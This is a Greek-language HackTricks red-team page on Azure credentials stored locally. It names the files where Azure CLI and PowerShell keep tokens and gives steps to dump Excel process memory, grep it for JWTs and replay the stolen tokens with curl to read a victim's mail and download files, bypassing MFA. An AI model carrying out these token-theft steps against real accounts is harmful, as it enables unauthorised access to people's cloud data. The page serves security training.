Az - Τοπ credentials Cloud

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Τοπική Αποθήκευση Token και Σκέψεις Ασφαλείας

Azure CLI (Διεπαφή Γραμμής Εντολών)

Τα tokens και τα ευαίσθητα δεδομένα αποθηκεύονται τοπικά από το Azure CLI, εγείροντας ανησυχίες ασφαλείας:

  1. Access Tokens: Αποθηκεύονται σε απλό κείμενο μέσα στο accessTokens.json που βρίσκεται στο C:\Users\<username>\.Azure.
  2. Πληροφορίες Συνδρομής: Το azureProfile.json, στον ίδιο φάκελο, περιέχει λεπτομέρειες συνδρομής.
  3. Αρχεία Καταγραφής: Ο φάκελος ErrorRecords μέσα στο .azure μπορεί να περιέχει αρχεία καταγραφής με εκτεθειμένα credentials, όπως:
  • Εκτελούμενες εντολές με ενσωματωμένα credentials.
  • URLs που προσπελάστηκαν χρησιμοποιώντας tokens, ενδεχομένως αποκαλύπτοντας ευαίσθητες πληροφορίες.

Azure PowerShell

Το Azure PowerShell αποθηκεύει επίσης tokens και ευαίσθητα δεδομένα, τα οποία μπορούν να προσπελαστούν τοπικά:

  1. Access Tokens: Το TokenCache.dat, που βρίσκεται στο C:\Users\<username>\.Azure, αποθηκεύει access tokens σε απλό κείμενο.
  2. Μυστικά Υπηρεσίας Principal: Αυτά αποθηκεύονται χωρίς κρυπτογράφηση στο AzureRmContext.json.
  3. Δυνατότητα Αποθήκευσης Token: Οι χρήστες έχουν τη δυνατότητα να διατηρούν tokens χρησιμοποιώντας την εντολή Save-AzContext, η οποία θα πρέπει να χρησιμοποιείται προσεκτικά για να αποτραπεί η μη εξουσιοδοτημένη πρόσβαση.

Αυτόματα Εργαλεία για να τα βρείτε

Tokens στη μνήμη

Όπως εξηγείται σε αυτό το βίντεο, κάποιο λογισμικό της Microsoft που συγχρονίζεται με το cloud (Excel, Teams…) μπορεί να αποθηκεύει access tokens σε καθαρό κείμενο στη μνήμη. Έτσι, απλά dumping τη μνήμη της διαδικασίας και grepping για JWT tokens μπορεί να σας δώσει πρόσβαση σε αρκετούς πόρους του θύματος στο cloud παρακάμπτοντας το MFA.

Βήματα:

  1. Dump τις διαδικασίες excel που συγχρονίζονται με τον χρήστη EntraID με το αγαπημένο σας εργαλείο.
  2. Εκτελέστε: string excel.dmp | grep 'eyJ0' και βρείτε αρκετά tokens στην έξοδο.
  3. Βρείτε τα tokens που σας ενδιαφέρουν περισσότερο και εκτελέστε εργαλεία πάνω τους:
# Check the identity of the token
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq

# Check the email (you need a token authorized in login.microsoftonline.com)
curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq

# Download a file from Teams
## You need a token that can access graph.microsoft.com
## Then, find the <site_id> inside the memory and call
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq

## Then, list one drive
curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq

## Finally, download a file from that drive:
curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'

Σημειώστε ότι αυτοί οι τύποι διακριτικών πρόσβασης μπορούν επίσης να βρεθούν μέσα σε άλλες διεργασίες.

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks